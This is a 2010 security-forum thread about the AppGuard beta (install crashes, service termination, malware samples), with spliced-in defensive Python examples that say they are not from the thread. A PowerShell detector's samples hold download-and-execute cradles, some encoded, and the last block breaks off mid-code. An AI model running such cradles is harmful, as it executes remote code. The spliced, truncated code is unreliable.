AppGuard Beta is Live (64 Bit, MemoryGuard)

Discussion in 'other anti-malware software' started by Eirik, Jul 7, 2010.

Thread Status:
Not open for further replies.
  1. Greg S

    Greg S Registered Member

    Joined:
    Mar 1, 2009
    Posts:
    1,039
    Location:
    A l a b a m a
    Thanks, I do have a backup of the policy. I did that some time back prior to removing the apps from it that I don't or never will use. Removing the unwanted cuts down on the unnecessary roughness to the Event Viewer, lol.
     
  2. Greg S

    Greg S Registered Member

    Joined:
    Mar 1, 2009
    Posts:
    1,039
    Location:
    A l a b a m a
    OK, I wanted to try this again now that I have an option to turn off MG. Upon reboot after installation, the desktop won't fully load. I get the taskbar, icons on the desktop and a cursor that spins. No other functions. I had to kill the power. Check disk does its thing on re-boot. After that all I get is a black screen for a desktop. What do you need?

    The command line you gave me does not work
    Code:
    AppGuard6432Setup.exe /v “/L *v AppGuardInstall.log
    I am in an Admin console and yes I am in the directory of the install file. I have re-booted into Safe Mode with networking, Event Viewer shows nothing in terms of an error for BRN but that all is enabled and OK. I'm sure you're busy so I'll have to bail out on this one too. Let me know about the command line above, I would love to try again but I need to know the correct syntax.
     
    Last edited: Jul 21, 2010
  3. Eirik

    Eirik Registered Member

    Joined:
    Oct 6, 2008
    Posts:
    544
    Location:
    Chantilly, Virginia
    Greg,

    I'm sorry about the problem.

    The command line instruction I provided was incorrect. It should be:

    AppGuardSetup.exe /v"/L*v AppGuardInstall.log

    In the string above, there should only be two spaces, after:
    - AppGuardSetup.exe
    - /v"/L*v

    Sorry, the person that provided me this information has been forced to listen to 30 minutes of Yoko Ono music. We should probably reduce this to 5 or 10 minutes, though. HR says we may have a lawsuit on our hands for causing post-traumatic disorder, and this person is suddenly afraid of dogs and seals.:D

    If this generated a Minidump file, that would tell us more.

    To clarify:
    - You did not get to do the XML tweak yet (i.e., AppGuard was utilizing an unaltered policy file when you observed the symptoms)
    - AppGuard was no longer on your test PC, your observations resulted from installing it via the command line (incorrect one), or without the command line (incorrect one), then you tried it again with the command line (incorrect one)?

    I'm passing this info to support.

    Cheers,

    Eirik
     
  4. Greg S

    Greg S Registered Member

    Joined:
    Mar 1, 2009
    Posts:
    1,039
    Location:
    A l a b a m a
    Yucko Ono music, at least that was more humane than having to stare at a picture of her for 30 minutes. Please give my respects and condolences to that person.

    No, tweak was not done. Kinda pointless since all functions were lost to desktop etc., which is strange considering Event Viewer for that time frame gave me an A+ on AG. I viewed Event Viewer from Safe Mode w/net support.

    No command line. The install file was launched from USB HD whilst AG had all protections suspended.

    Yes, I did try again to launch setup whilst in Safe Mode by using the Yoko Ono command line. It was going to be my attempt to repair the install, which I had hoped would generate the needed dump file, but I forgot that the installer won't work in Safe Mode either, lol.

    Question: If Event Viewer was showing all was OK for AG but my OS wasn't, what's the odds of it not generating the dump file?
     
  5. Tarantula

    Tarantula Guest

    I have just downloaded and installed AppGuard x64 beta on Win 7 Ultimate x64 SP1 (official beta). Started with my tests and what I saw: it's a piece of cake to disable the main service of AppGuard >>> http://yfrog.com/n558731608p

    And this is with all options enabled. Now I can easily install whatever I want and AppGuard doesn't protect me anymore. Today I tested some AVs vs some malware and there was one that disables the Security Center, firewall and Windows Defender services. What can stop it from doing the same with the Blue Ridge AppGuard Service?
     
  6. Kees1958

    Kees1958 Registered Member

    Joined:
    Jul 8, 2006
    Posts:
    5,857
    Well that would be very hard for malware. Some security programs like AppGuard are designed to protect with zero pop-ups for the average user.

    Average Joe/Jane

    Running Windows 7 (64 bit because it is put on every new PC nowadays), has UAC in default, with AppGuard you get
    a) deny write (create/delete/update) intent access to Windows and Programs Directories for guarded programs
    b) deny write (setting values, creating/deleting subkeys, etc) for HKLM registry hive
    c) deny execute on user space (Users and Programs Data directories)
    d) memory violation protection

    Question:
    How would a process running low or medium rights plus the protection of AppGuard be able to end system processes?

    Regards Kees
     
  7. Eirik

    Eirik Registered Member

    Joined:
    Oct 6, 2008
    Posts:
    544
    Location:
    Chantilly, Virginia
    Hi Tarantula,

    Thank you for participating in our beta. You've just made a helpful contribution to the beta. Engineering has declared this termination of the AppGuard service a bug.

    I'm assuming that you used the service control manager (SCM) to terminate the AppGuard service. Is that correct? If not, please elaborate.

    Cheers,

    Eirik
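    The check behind Tarantula's finding and Kees's question, as an added example that is not part of the thread and not Blue Ridge code: whether a service's DACL, as printed by `sc.exe sdshow "<service name>"`, grants stop/reconfigure/delete rights to principals an unprivileged process holds (Interactive, Authenticated Users, Everyone, Users). The SDDL strings are constructed for the example; the service name is not assumed. Group membership is not expanded and admin-level principals (SY, BA) are out of scope, since the point is what a medium-rights process can do through the Service Control Manager.

```python
"""
Added example (not Blue Ridge/AppGuard code): find ACEs in a service's SDDL
that let low-privilege principals stop, reconfigure or delete the service.
All SDDL strings below are constructed for this example.
"""
import re

# Two-letter SDDL access codes as they apply to service objects.
SERVICE_RIGHTS = {
    "CC": 0x0001,  # SERVICE_QUERY_CONFIG
    "DC": 0x0002,  # SERVICE_CHANGE_CONFIG
    "LC": 0x0004,  # SERVICE_QUERY_STATUS
    "SW": 0x0008,  # SERVICE_ENUMERATE_DEPENDENTS
    "RP": 0x0010,  # SERVICE_START
    "WP": 0x0020,  # SERVICE_STOP
    "DT": 0x0040,  # SERVICE_PAUSE_CONTINUE
    "LO": 0x0080,  # SERVICE_INTERROGATE
    "CR": 0x0100,  # SERVICE_USER_DEFINED_CONTROL
    "SD": 0x00010000,  # DELETE
    "RC": 0x00020000,  # READ_CONTROL
    "WD": 0x00040000,  # WRITE_DAC
    "WO": 0x00080000,  # WRITE_OWNER
    "GA": 0x10000000,  # GENERIC_ALL
    "GX": 0x20000000,  # GENERIC_EXECUTE
    "GW": 0x40000000,  # GENERIC_WRITE
    "GR": 0x80000000,  # GENERIC_READ
}
# Rights that let a caller kill, hijack or unprotect the service.
TAMPER_RIGHTS = {
    "SERVICE_STOP": 0x0020, "SERVICE_CHANGE_CONFIG": 0x0002, "DELETE": 0x00010000,
    "WRITE_DAC": 0x00040000, "WRITE_OWNER": 0x00080000,
    "GENERIC_WRITE": 0x40000000, "GENERIC_ALL": 0x10000000,
}
# Principals an unprivileged (medium/low integrity) process normally holds.
LOW_PRIV_SIDS = {
    "IU": "Interactive", "AU": "Authenticated Users", "WD": "Everyone",
    "BU": "Builtin Users", "BG": "Builtin Guests", "AN": "Anonymous",
    "S-1-5-4": "Interactive", "S-1-5-11": "Authenticated Users",
    "S-1-1-0": "Everyone", "S-1-5-32-545": "Builtin Users",
}

DACL_RE = re.compile(r"D:[PAIR]*((?:\([^)]*\))*)")
ACE_RE = re.compile(r"\(([^)]*)\)")


def parse_rights(field):
    """Rights field: either hex ('0x20') or concatenated two-letter codes."""
    if field.lower().startswith("0x"):
        return int(field, 16)
    mask = 0
    for i in range(0, len(field), 2):
        code = field[i:i + 2].upper()
        if code not in SERVICE_RIGHTS:
            raise ValueError(f"unknown access code {code!r}")
        mask |= SERVICE_RIGHTS[code]
    return mask


def parse_dacl(sddl):
    """Return [(ace_type, mask, sid)] from the D: section of an SDDL string."""
    m = DACL_RE.search(sddl)
    if not m:
        return []
    aces = []
    for body in ACE_RE.findall(m.group(1)):
        fields = body.split(";")
        if len(fields) < 6:
            raise ValueError(f"malformed ACE {body!r}")
        ace_type, _flags, rights, _obj, _inherit, sid = fields[:6]
        aces.append((ace_type.upper(), parse_rights(rights), sid.upper()))
    return aces


def effective_rights(sddl):
    """Per-SID mask after subtracting access-denied ACEs (no group expansion)."""
    allowed, denied = {}, {}
    for ace_type, mask, sid in parse_dacl(sddl):
        if ace_type == "A":
            allowed[sid] = allowed.get(sid, 0) | mask
        elif ace_type == "D":
            denied[sid] = denied.get(sid, 0) | mask
    return {sid: m & ~denied.get(sid, 0) for sid, m in allowed.items()}


def find_tamperable(sddl):
    """[(sid, principal, [right names])] for low-privilege SIDs that can tamper."""
    findings = []
    for sid, mask in effective_rights(sddl).items():
        if sid not in LOW_PRIV_SIDS:
            continue
        names = [n for n, bit in TAMPER_RIGHTS.items() if mask & bit]
        if names:
            findings.append((sid, LOW_PRIV_SIDS[sid], names))
    return findings


# Constructed: a default-looking descriptor (Interactive may only query/read).
SDDL_DEFAULT = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
                "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
# Constructed: same, but Interactive has been granted RP/WP (start/stop).
SDDL_WEAK = SDDL_DEFAULT.replace("(A;;CCLCSWLOCRRC;;;IU)", "(A;;CCLCSWRPWPDTLOCRRC;;;IU)")
# Constructed: a deny ACE cancels the weak grant; hex-form grant of WP to AU.
SDDL_MIXED = "D:(D;;WP;;;IU)(A;;CCLCSWRPWPDTLOCRRC;;;IU)(A;;0x20;;;AU)(A;;GA;;;BA)"

if __name__ == "__main__":
    for label, sddl in (("default", SDDL_DEFAULT), ("weak", SDDL_WEAK), ("mixed", SDDL_MIXED)):
        print(label, find_tamperable(sddl))
```

    A non-empty result means a process running as that principal can stop or reconfigure the service with plain `sc stop` / `sc config` calls, no elevation needed; an empty result only says the SCM's own access check holds, not that an elevated process could not still stop it.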
     
  8. Eirik

    Eirik Registered Member

    Joined:
    Oct 6, 2008
    Posts:
    544
    Location:
    Chantilly, Virginia
    Thank you Kees.

    AppGuard also suppresses script launches from user-space. I believe that includes (sorry, top of mind answer here): .bat, .vbs, .com, .cmd. I'm trying to remember others...

    Are there other script types that you all consider too dangerous to be allowed to run from user-space? Please let me know.

    Also, MSI files are not allowed to launch from user-space, unless digitally signed by Microsoft. We'll add other trusted publishers.

    Other user-space protection features are under consideration right now.

    Cheers,

    Eirik
     
  9. Eirik

    Eirik Registered Member

    Joined:
    Oct 6, 2008
    Posts:
    544
    Location:
    Chantilly, Virginia
    This Windows LNK vulnerability hype has made for some interesting discussions. And from time to time, our 'high-value target' enterprise customers send us malware samples. This week we received roughly the same sample from multiple sources wishing to confirm MemoryGuard at work. I'm mentioning this because this sample is widely reported to affect both enterprise and consumer PCs. And, because it involves MemoryGuard, our beta.

    It's a download that makes use of the LNK vulnerability with names such as W32.Changeup (Symantec), W32/Autorun.BFG (Sophos), Win32/AutoRun.VB.RD (Eset), Worm:Win32/Vobfus.R (Microsoft), Download-CJX (McAfee), TR/Dldr.Gaat.B (Avira).

    As Wilders folk would expect, and as I wrote in our blog "AppGuard Snuffs-Out Windows LNK Vulnerability Zero-Day Attacks", the LNK vulnerability alone is not that remarkable given the oldest of AppGuard protection features.

    The sample gets interesting when one lets the downloader run, unguarded, without privacy mode, or anything but MemoryGuard restricting it. Here's a screenshot from AppGuard (beta):

    http://www.blueridgenetworks.com/securitynowblog/wp-content/uploads/2010/07/Rieonim_LNK-Malware-Blocked-by-MG21.jpg

    Frankly, I was surprised because the one or two write-ups on the Internet that I had read did not mention code injections. But, I'm not a professional malware ...

    Are you seeing MemoryGuard intercepting malware in consumer space?

    We've gained some useful insights regarding MemoryGuard 'out of the lab'. I believe you'll be quite pleased with it in AppGuard 2.x next month (possibly September). It's still important for us to continue to receive log files from your beta1 and soon beta2 observations.

    Barring any last minute Quality issues, we'll release beta 2 Thursday evening (eastern daylight time) next week.

    Cheers,

    Eirik
     
    Last edited: Jul 23, 2010
  10. Tarantula

    Tarantula Guest


    You are welcome! And yes, that's right. :)

    edit: One question. Is this the correct email that I'm supposed to use for feedback -> appguard@blueridgenetworks.com
    I'm asking because I have a file (pdf exploit) that creates an administrator account without a notice by AppGuard and I want to send it to you.
     
    Last edited by a moderator: Jul 23, 2010
  11. Eirik

    Eirik Registered Member

    Joined:
    Oct 6, 2008
    Posts:
    544
    Location:
    Chantilly, Virginia
    Yes, thanks for the file. I'm looking forward to hearing what our folk say.

    Btw, I've got many activation codes to send out. I'll do so tonight.

    Thanks again for the helpful feedback.

    Cheers

    Eirik
     
  12. Greg S

    Greg S Registered Member

    Joined:
    Mar 1, 2009
    Posts:
    1,039
    Location:
    A l a b a m a
    It's still incorrect at least for the Beta, it should be

    Code:
    AppGuard6432Setup.exe /v"/L*v AppGuardInstall.log
    Anyway, unless I'm missing it somewhere, it didn't create a log file. This time the install worked without crashing the desktop but for some reason, no Memory Guard alerts. I haven't tried the xml tweak yet so it's not that. Memory Guard is working because like the last install, Avast will not update and two other apps I usually run will not work. I'm just not getting the alerts.



    There is no <bPreventCodeInjection> in ProgramData. I have that entry in my User folder xml policy. Which is correct? I'm confused

    I'm getting the feeling this install is botched as well.

    Update: My feelings were correct. I re-booted to the crashed black desktop with nothing left to do but kill the power and restore.
     
    Last edited: Jul 23, 2010
  13. Eirik

    Eirik Registered Member

    Joined:
    Oct 6, 2008
    Posts:
    544
    Location:
    Chantilly, Virginia
    Greg,

    I'm very disappointed that you've encountered these problems. I apologize for your inconvenience. I've asked developers to contact you via your email.

    I agree with your expedient resolution: 'restore'.

    Eirik
     
  14. Greg S

    Greg S Registered Member

    Joined:
    Mar 1, 2009
    Posts:
    1,039
    Location:
    A l a b a m a
    As a last ditch effort, I uninstalled the release version and nuked everything BRN from the HD and Registry. Installed the Beta, edited the XML policy and all appears to be well. I'm sorry I couldn't provide any useful info but as mentioned earlier, even though it wouldn't allow my desktop to load, Event Viewer stated that everything was fine. Have you changed my license info? Can I install this on my wife's x64 using my present license?
     
  15. Greg S

    Greg S Registered Member

    Joined:
    Mar 1, 2009
    Posts:
    1,039
    Location:
    A l a b a m a
    I have this(rescache.hit) set in Malware Defender to ask on everything.
    Code:
    07/26/10 16:13:19 Prevented process <Internet Explorer> from writing to <e:\windows\rescache\rc0007\rescache.hit>.
    
    Why is AG alerting me to such a thing when Malware Defender is not. I have tested Malware Defender ask policy on this particular file and it will warn if anything is attempted but when AG alerts me, I get no warning from MD. Should I allow this one file in AG's exceptions? It is possible that if in fact AG has prevented this then MD would not even have a chance to chime in. Curious
     
  16. Eirik

    Eirik Registered Member

    Joined:
    Oct 6, 2008
    Posts:
    544
    Location:
    Chantilly, Virginia
    I don't recognize it. My rule of thumb: if a block hasn't 'broken' anything, don't create an exception, especially if the action is unknown.

    As for MD, your speculation may be correct. Unfortunately, I don't know.
     
  17. Eirik

    Eirik Registered Member

    Joined:
    Oct 6, 2008
    Posts:
    544
    Location:
    Chantilly, Virginia
    Hi all,

    We need to delay beta 2 until Monday. The QA folks found a bug we consider a showstopper. Sorry.

    Eirik
     
  18. tonyf1971

    tonyf1971 Registered Member

    Joined:
    Nov 20, 2007
    Posts:
    58

    do you still want additional log files from beta 1 or shall i wait until beta 2 before submitting more ?
     
  19. Eirik

    Eirik Registered Member

    Joined:
    Oct 6, 2008
    Posts:
    544
    Location:
    Chantilly, Virginia
    All logs are potentially helpful. If I had to choose, then I'd wait for beta 2 logs.

    Thanks,

    Eirik
     
  20. 1000db

    1000db Registered Member

    Joined:
    Jan 9, 2009
    Posts:
    718
    Location:
    Missouri
    Can we have a status update? Is the "show stopper" resolved?
     
  21. Eirik

    Eirik Registered Member

    Joined:
    Oct 6, 2008
    Posts:
    544
    Location:
    Chantilly, Virginia
    You just beat me to the punch... Our webmaster was unavailable and could not post the new beta until about an hour ago. It's live!!!

    So what's new in beta2?

    To begin with, MemoryGuard has an enable/disable button. The refinements we have in mind will be in the next release (2.1.x) later this month, possibly early September. This will not be a beta release. For beta 2, we ask that you enable MemoryGuard to gather log data. Be warned, in its present form, MemoryGuard blocks many legit actions by antivirus software and a few Windows facilities. We need your log data to better refine MemoryGuard for the 2.1 release coming soon. Please run MemoryGuard long enough to generate extensive blocking event logs, which can help us define even better refinements.

    Beta2 adds the following to what you saw in Beta1:

    - Parental Controls (please read the embedded Help for details)
    - MBRguard is integrated into AppGuard
    - Ignore Messages
    - Enhanced User-Space Protection, we're renaming 'Drive-by Download Protection' to 'User-Space Protection'
    - Update alert

    More details and the download here:
    http://www.blueridgenetworks.com/support/appguard6432/

    I should like to also clarify a system requirement that we failed to communicate. AppGuard on Vista requires Service Pack 1 (and later).

    As many of you probably know by now, David Kennedy reported and demonstrated a vulnerability that allows an attacker to elude built-in PowerShell restrictions. Apparently, no AV or HIPS product can stop such attacks, though I wouldn't care to make so bold a statement myself other than merely repeat what others assert. I hear these attacks also elude software restriction policies (SRP). We have NOT verified this!!! Kennedy has released Metasploit modules, btw. We expect attacks in the wild soon.

    I mention this PowerShell vulnerability because we believe AppGuard beta 2 will stop such attacks from user-space by default. Those that add powershell.exe to the 'guard list' enjoy a higher degree of protection from a less common vector where the PowerShell code is executed by a 'trusted' application (I use this term loosely as we do NOT really 'trust' applications). This latter form of attack tends to be executed by more sophisticated cyber criminals on high value targets such as government organizations and large corporations. As per the beta, we would greatly appreciate your feedback on the guarding of powershell.exe.

    We look forward to your feedback and would appreciate your spreading the word. Beta participants get a free lifetime license for up to three concurrent computers.

    Cheers,

    Eirik
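    The complement to guarding powershell.exe, as an added example that is not from the thread or from Blue Ridge: triage of powershell.exe command lines for the execution-policy bypass and download-and-execute patterns the post refers to. The execution policy is a convenience setting, not a security boundary, so a defender looks for how it was switched off (`-ExecutionPolicy Bypass`, `-EncodedCommand`, script fed on stdin) rather than relying on it. The command lines and the `example.invalid` host are constructed for the example; the switch abbreviations follow powershell.exe's own prefix matching.

```python
"""
Added example (not Blue Ridge/AppGuard code): triage powershell.exe command
lines for execution-policy bypass and script-download indicators.
The sample command lines below are constructed for this example.
"""
import base64
import re

# Indicators that on their own make a command line worth a look.
STRONG = {"policy-override", "encoded-command", "download-cradle", "invoke-expression", "stdin-script"}
CRADLE_RE = re.compile(r"(?i)(downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b|frombase64string)")
IEX_RE = re.compile(r"(?i)(\biex\b|invoke-expression)")


def tokenize(cmdline):
    """Split a Windows command line, keeping double-quoted arguments whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def canonical_switch(tok):
    """Map a powershell.exe switch (or an accepted abbreviation) to its full name."""
    if not tok.startswith(("-", "/")) or len(tok) < 2:
        return None
    name = tok[1:].lower()
    table = (  # (canonical, explicit aliases, minimum prefix length)
        ("encodedcommand", ("e", "ec"), 3),
        ("executionpolicy", ("ep",), 2),
        ("command", ("c",), 3),
        ("noprofile", ("nop",), 4),
        ("windowstyle", ("w",), 3),
        ("noninteractive", ("noni",), 4),
        ("file", ("f",), 2),
    )
    for canon, aliases, minlen in table:
        if name in aliases or (len(name) >= minlen and canon.startswith(name)):
            return canon
    return name


def encode_command(script):
    """The UTF-16LE base64 form powershell.exe expects after -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded(b64):
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline):
    """Return indicators, any decoded -EncodedCommand payload, and a verdict."""
    toks = tokenize(cmdline)
    indicators, decoded, script_text = [], None, ""
    i = 0
    while i < len(toks):
        sw = canonical_switch(toks[i])
        val = toks[i + 1] if i + 1 < len(toks) else ""
        if sw == "executionpolicy" and val.lower() in ("bypass", "unrestricted"):
            indicators.append("policy-override")
            i += 2
            continue
        if sw == "encodedcommand":
            decoded = decode_encoded(val)
            indicators.append("encoded-command")
            script_text += " " + (decoded or "")
            i += 2
            continue
        if sw == "command":
            if val == "-":  # script body arrives on stdin, nothing on disk
                indicators.append("stdin-script")
            script_text += " " + " ".join(toks[i + 1:])
            break
        if sw in ("noprofile", "noninteractive") or (sw == "windowstyle" and val.lower() == "hidden"):
            indicators.append("quiet:" + sw)  # supporting evidence only
        i += 1
    if CRADLE_RE.search(script_text):
        indicators.append("download-cradle")
    if IEX_RE.search(script_text):
        indicators.append("invoke-expression")
    return {"indicators": indicators, "decoded": decoded,
            "suspicious": any(ind in STRONG for ind in indicators)}


def scan(cmdlines):
    """Only the command lines that carry a strong indicator, with their analysis."""
    results = [(c, analyze(c)) for c in cmdlines]
    return [(c, r) for c, r in results if r["suspicious"]]


# Constructed process command lines (one benign, three that bypass the policy).
SAMPLE_COMMAND_LINES = [
    r'powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\scripts\backup.ps1',
    'powershell.exe -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString(\'http://example.invalid/a.ps1\')"',
    "powershell.exe -enc " + encode_command("Invoke-Expression (New-Object Net.WebClient).DownloadString('http://example.invalid/b.ps1')"),
    "powershell.exe -Command -",
]

if __name__ == "__main__":
    for cmd, result in scan(SAMPLE_COMMAND_LINES):
        print(result["indicators"], cmd[:60])
```

    The encoded form is decoded and scanned as well, so an `-enc` payload that fetches and runs remote script is flagged for the same reason as its plain-text equivalent; `-NoProfile` alone (the first sample) is not enough to raise a verdict.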
     
  22. pegr

    pegr Registered Member

    Joined:
    Apr 8, 2008
    Posts:
    2,280
    Location:
    UK
    Hi Eirik,

    I have two questions relating to the new version.

    Q1. Will there also be enhanced System-Space protection in the new version? This is something we've discussed previously.

    The scenario I have in mind is this: Many machines come with a pre-installed system recovery partition as well as the partition that the system boots from. As non-system partitions are automatically treated by AppGuard 1.4.7 as Extended User-Space, there needs to be a way for the user to add exclusions to move selected drive letters, folders, and sub-folders from User-Space into System-Space, in order to protect them against being written to by Guarded Applications.

    In AppGuard 1.4.7, the Drive-By Download Protection Settings has two tabs: Allow and Deny. If the Guarded Applications Exception Folders Settings also had a Deny tab in addition to the (implicit) Allow tab, it would not only enable the user to allow Guarded Applications write access to the specified folders, it would also enable the user to deny Guarded Applications write access to the specified folders.

    It would be nice to see the AppGuard 2.x GUI provide better transparency regarding what constitutes System-Space and User-Space, combined with the flexibility for customisation to move folders in both directions between the two. Whilst the concept is both brilliant and simple, I've always thought that the implementation in AppGuard 1.4.7 is incomplete and lacks clarity.

    Q2. As you are aware from previous conversations, AppGuard is adding around 20 seconds to the boot times on my Windows XP system. You did say that the engineers had found what they thought was a problem with the licensing code that may be causing this problem. Has this now been fixed in the new version?

    TIA.

    Regards
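    A toy model of the rules discussed in this thread, as an added example that is not AppGuard's code and does not describe its implementation: Kees's list (guarded applications may not write to the Windows and Program Files trees or the HKLM hive, and may not execute from user-space), Eirik's additions (script types suppressed from user-space; MSIs only when Microsoft-signed) and pegr's description of 1.4.7 behaviour (everything outside the system partition's system folders, other partitions included, is user-space; exception folders grant guarded applications write access). The `deny_folders` list models pegr's proposed Deny tab and is a proposal, not a shipped feature; the extra script extensions beyond `.bat`, `.cmd`, `.com` and `.vbs` are this example's own generalization; the Authenticode check is assumed to have been done elsewhere and only its result (the publisher name) is passed in.

```python
"""
Added example (not AppGuard code): a toy user-space / system-space policy
evaluator built from the rules described in the thread.  Folder lists and
the system-drive default are constructed; only the rules come from the thread.
"""
import ntpath

# Script types the thread names as suppressed from user-space ...
THREAD_SCRIPT_EXTS = {".bat", ".cmd", ".com", ".vbs"}
# ... plus further script hosts this example adds on its own (a generalization).
EXTRA_SCRIPT_EXTS = {".js", ".jse", ".vbe", ".wsf", ".wsh", ".ps1", ".hta", ".scr", ".pif"}
# Thread: MSIs may launch from user-space only when signed by Microsoft.
TRUSTED_MSI_PUBLISHERS = {"microsoft"}


def normalize(path):
    """Win32-style canonical form: backslashes, '..' resolved, trailing dots and
    spaces dropped from the last component (as Win32 does), case-folded."""
    p = path.replace("/", "\\")
    if p.startswith("\\\\?\\"):
        p = p[4:]
    p = ntpath.normpath(p)
    head, tail = ntpath.split(p)
    tail = tail.rstrip(". ")
    if tail:
        p = ntpath.join(head, tail)
    return p.casefold()


def under(path, root):
    path, root = normalize(path), normalize(root)
    return path == root or path.startswith(root.rstrip("\\") + "\\")


def system_space_roots(system_drive="C:"):
    """System-space is the system drive's Windows and Program Files trees only;
    every other location, other partitions included, is user-space."""
    return tuple(ntpath.join(system_drive + "\\", d)
                 for d in ("Windows", "Program Files", "Program Files (x86)"))


def is_system_space(path, system_drive="C:", deny_folders=()):
    # deny_folders: folders an admin moved into system-space (pegr's proposal).
    return any(under(path, r) for r in system_space_roots(system_drive) + tuple(deny_folders))


def decide_write(target, system_drive="C:", exception_folders=(), deny_folders=()):
    """Write (create/delete/update) attempted by a guarded application."""
    if any(under(target, f) for f in exception_folders):
        return "allow", "guarded-app exception folder"
    if is_system_space(target, system_drive, deny_folders):
        return "block", "write to system-space"
    return "allow", "write to user-space"


def decide_registry_write(key):
    """Registry write attempted by a guarded application: HKLM is off limits."""
    root = key.replace("/", "\\").casefold().split("\\", 1)[0]
    if root in ("hklm", "hkey_local_machine"):
        return "block", "write to HKLM hive"
    return "allow", f"write to {root} hive"


def decide_execute(path, by_guarded_app=False, msi_signer=None, system_drive="C:", deny_folders=()):
    """Launch of `path`.  msi_signer is the already-verified Authenticode publisher."""
    if is_system_space(path, system_drive, deny_folders):
        return "allow", "system-space launch"
    ext = ntpath.splitext(normalize(path))[1]
    if ext == ".msi":  # assumption: the signer rule is checked before the guarded-app rule
        if msi_signer and msi_signer.casefold() in TRUSTED_MSI_PUBLISHERS:
            return "allow", f"user-space MSI signed by {msi_signer}"
        return "block", "user-space MSI without trusted signature"
    if ext in THREAD_SCRIPT_EXTS | EXTRA_SCRIPT_EXTS:
        return "block", f"script type {ext} launched from user-space"
    if by_guarded_app:
        return "block", "guarded application launching from user-space"
    # Assumption: launches the thread does not mention fall through.
    return "allow", "user-space launch not covered by these rules"


if __name__ == "__main__":
    print(decide_write(r"C:\Windows\System32\evil.dll"))
    print(decide_write(r"D:\Recovery\boot.wim", deny_folders=(r"D:\Recovery",)))
    print(decide_execute(r"C:\Users\me\Downloads\x.BAT."))
```

    Two things worth noticing: path normalization happens before any prefix test, so `C:/Windows/../Users/me/a.txt` is judged as user-space and `x.BAT.` is judged as a `.bat` file; and a `Windows` folder on a non-system partition is user-space under these rules, which is exactly the gap pegr's Deny tab would close.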
     
  23. Eirik

    Eirik Registered Member

    Joined:
    Oct 6, 2008
    Posts:
    544
    Location:
    Chantilly, Virginia
    Per your first question, you made two excellent points. We were unable to get the requested 'enhanced system space' into beta2. I'll have to get back to you on when we will. On the second point about improving the GUI, particularly in terms of displaying what user-space is at the moment (add/remove an external hard drive, one changes user-space), that is very much what I want the AppGuard GUI to do. In fact, I had hoped to get this into beta1 but had to surrender it this time around to other features.

    On the second question regarding prolonged boot times, yes we have implemented changes that we hope significantly improves this insofar as the licensing was delaying things. If however, there was a different, undiscovered cause or contributor, then we probably didn't fully solve the issue. If the problem was not solved, please let us know ASAP to improve the chances of discovering the 'other' cause and solving it before the next release.

    Cheers,

    Eirik
     
  24. pegr

    pegr Registered Member

    Joined:
    Apr 8, 2008
    Posts:
    2,280
    Location:
    UK
    Hi Eirik,

    Thanks very much for the comprehensive and helpful reply. :)

    I would very much like to test a beta version in order to see if the slow booting problem has been resolved before the next release, and also to provide any other feedback that may be of use, but it appears that Windows XP is not a supported operating system for the current beta.

    Regards
     
  25. Greg S

    Greg S Registered Member

    Joined:
    Mar 1, 2009
    Posts:
    1,039
    Location:
    A l a b a m a
    Eirik, I don't think you ever answered my question as to where the AppGuardInstall.log is located, but I have just now downloaded the latest version for install and noticed the log file in the folder of the last beta. Do you need this log file? Do I need to run the command line again for this install just in case? Should I uninstall the previous Beta? Is this installation problem a result of me editing my XML policies? And before you ask, yes they are edited correctly, I assure you. One more, is the MBR protection enabled by default? I'm still skeptical of this with the likes of Comodo Time Machine, Eaz-Fix etc.

    One thing I noticed in the log file
    Code:
    MSI (c) (00:30) [18:46:03:578]: Cleaning up uninstalled install packages, if any exist
    For me, AG does not do this. At one time, I had four different installers in the Windows/Installer folder.

    Also, the download link gives me the previous beta according to the install. The options I get are to remove, repair etc.. Right click, Save Target as seems to give me the correct file.

    Update:
    Gave the latest version a try at installing. BSOD on the Welcome Screen. I also got this during install
    (attachment: Untitled.png)
     
    Last edited: Aug 4, 2010
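    For the log file that the `/L*v AppGuardInstall.log` command line produces (Eirik's post and Greg's excerpt above), as an added example that is neither from the thread nor Blue Ridge code: a small parser for Windows Installer verbose logs that pulls out the client/server entries, the first action whose `Return value` is 3 (fatal error), the `-- Error NNNN.` lines and the final `Installation failed` verdict, which is usually all one needs before sending the log to support. The log text is constructed to look like one; only the "Cleaning up uninstalled install packages" line is quoted from the thread, and the service name in the 1923 line is made up. A practical point for anyone repeating Greg's search: a relative log name is written to the working directory of the process that invokes msiexec, so passing an absolute path avoids having to look for it afterwards.

```python
"""
Added example (not Blue Ridge/AppGuard code): summarize a Windows Installer
verbose log (msiexec /L*v output).  SAMPLE_LOG is constructed for this example.
"""
import re

# "MSI (c) (00:30) [18:46:03:578]: message"  c = client process, s = server process
MSI_LINE_RE = re.compile(
    r"^MSI \((?P<ctx>[cs])\) \((?P<proc>[0-9A-Fa-f]{2}):(?P<thread>[0-9A-Fa-f]{2})\) "
    r"\[(?P<ts>\d{2}:\d{2}:\d{2}:\d{3})\]: (?P<msg>.*)$")
# "Action ended 18:46:13: InstallServices. Return value 3."
ACTION_END_RE = re.compile(
    r"^Action ended (?P<ts>\d{2}:\d{2}:\d{2}): (?P<action>[^.\s]+)\. Return value (?P<rv>\d+)\.$")
RETURN_VALUES = {1: "success", 2: "user cancelled", 3: "failed"}  # other codes reported as-is


def parse_log(text):
    """Classify each line as an MSI entry, an action-end record, or other text."""
    entries = []
    for line in text.splitlines():
        m = MSI_LINE_RE.match(line)
        if m:
            entries.append({"kind": "msi", **m.groupdict()})
            continue
        m = ACTION_END_RE.match(line)
        if m:
            entries.append({"kind": "action_end", "action": m["action"],
                            "rv": int(m["rv"]), "ts": m["ts"]})
            continue
        entries.append({"kind": "other", "msg": line})
    return entries


def summarize(text):
    entries = parse_log(text)
    msi = [e for e in entries if e["kind"] == "msi"]
    failed = [e for e in entries
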